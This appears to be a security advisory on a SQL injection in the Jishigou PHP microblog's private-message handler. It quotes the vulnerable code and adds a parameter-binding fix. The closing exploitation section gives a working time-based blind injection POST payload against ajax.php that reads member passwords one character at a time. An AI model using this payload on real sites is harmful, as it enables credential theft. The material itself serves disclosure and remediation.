Tested version: 20140124

1. Analysis:

Filename: pm.mod.php

    .......... lines above omitted ..........
    load::logic('pm');
    $PmLogic = new PmLogic();
    $pmid = $this->Post['pmid'];
    if($che = $this->Post['che']){
        $this->Post['to_user'] = implode(",",$che);  // account names to send to
    }
    $this->Post['message'] = jpost('message', 'txt'); // message body
    if($pmid > 0){
        $return = $PmLogic->pmSendAgain($this->Post);
    }else{
        $return = $PmLogic->pmSend($this->Post);      // with no pmid set we enter pmSend(); let's look inside it
    }
    .......... lines below omitted ..........

//master.mod.php
$this->Get = &$_GET;
$this->Post = &$_POST;
--------------------------------------------------
Filename: pm.logic.php

    .......... lines above omitted ..........
    $to_user_list=array();

    .......... middle omitted ..........

    foreach($to_user_list as $to_user_id => $to_user_name)
    {
        $data = array(
            "msgfrom"     => $susername,
            "msgnickname" => $snickname,
            "msgfromid"   => $suid,
            "msgto"       => $to_user_name['username'],
            "tonickname"  => $to_user_name['nickname'],
            "msgtoid"     => $to_user_id,
            'imageids'    => $post['imageids'],
            'attachids'   => $post['attachids'],  // the $post values are what pm.mod.php passed in; keep reading
            "subject"     => $post['subject'],
            "message"     => $post['message'],
            "new"         => '1',
            "dateline"    => $time,
        );

    .......... middle omitted ..........

        # tag the images and attachments so they are not deleted when the cache is cleared
        if($data['imageids']){
            DB::query("update `".TABLE_PREFIX."topic_image` set `tid` = -1 where `id` in ({$data['imageids']})"); // no quoting and no filtering: the variable goes straight into the query
        }
        if($data['attachids']){
            DB::query("update `".TABLE_PREFIX."topic_attach` set `tid` = -1 where `id` in ({$data['attachids']})"); // no quoting and no filtering: the variable goes straight into the query
        }
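The fix for the two DB::query calls above is to stop treating imageids/attachids as SQL text at all: the values are meant to be lists of integer ids, so they can be whitelisted to digits and bound as placeholders. The following is an added example written for this page, not code from the Jishigou project; the function names, the PDO-style placeholder query and the sample inputs are assumptions, and the table prefix `jishigou_` and column names are taken from the page.

```php
<?php
// Added example, not part of the Jishigou code base.
// Whitelist a comma-separated id list to plain integers before it ever
// reaches the `id IN (...)` clause. Returns an array of ints, an empty
// array for an empty input, or null if any element is not a bare integer.
function parse_id_list(string $raw): ?array {
    if (trim($raw) === '') {
        return [];
    }
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // Only digits are allowed: no signs, spaces, parentheses or keywords
        if (!preg_match('/\A\d+\z/', $part)) {
            return null;
        }
        $ids[] = (int) $part;
    }
    return $ids;
}

// Build the UPDATE with one placeholder per id, so no user-supplied text is
// concatenated into the SQL string. Returns [sql, params]; sql is null when
// there is nothing to update. The function name is an assumption.
function build_detach_query(string $table_prefix, string $table, array $ids): array {
    if ($ids === []) {
        return [null, []];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "update `{$table_prefix}{$table}` set `tid` = -1 where `id` in ({$placeholders})";
    return [$sql, $ids];
}

// Constructed inputs standing in for $post['attachids']
$samples = [
    '12, 7,13',          // legitimate list
    '1,SELECT 1',        // anything that is not a bare integer list is rejected
    '',                  // empty: nothing to update, matches the original if() guard
];
foreach ($samples as $raw) {
    $ids = parse_id_list($raw);
    if ($ids === null) {
        echo "rejected: " . var_export($raw, true) . "\n";
        continue;
    }
    [$sql, $params] = build_detach_query('jishigou_', 'topic_attach', $ids);
    if ($sql === null) {
        echo "skipped: empty list\n";
        continue;
    }
    echo $sql, "  params=", json_encode($params), "\n";
    // With a PDO connection this would be: $pdo->prepare($sql)->execute($params);
}
```

Rejecting rather than silently casting is deliberate: an `intval()` of the payload on this page would turn it into `0` and the request would appear to succeed, whereas a rejected request can be logged and counted, which is the signal a defender wants when someone is probing this endpoint.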

Since any SQL execution error is written to a log file rather than returned to the user, we have to fall back on blind injection.

2. Exploitation:
Requires being logged in.
ajax.php?mod=pm&code=do_add
Submitted via POST:

to_user=admin&message=eeeeeeeeeeeeeeeeeeeeee&save_to_outbox=0&imageids=1&attachids=SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members

SQL statement executed:

update `jishigou_topic_attach` set `tid` = -1 where `id` in (SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members)
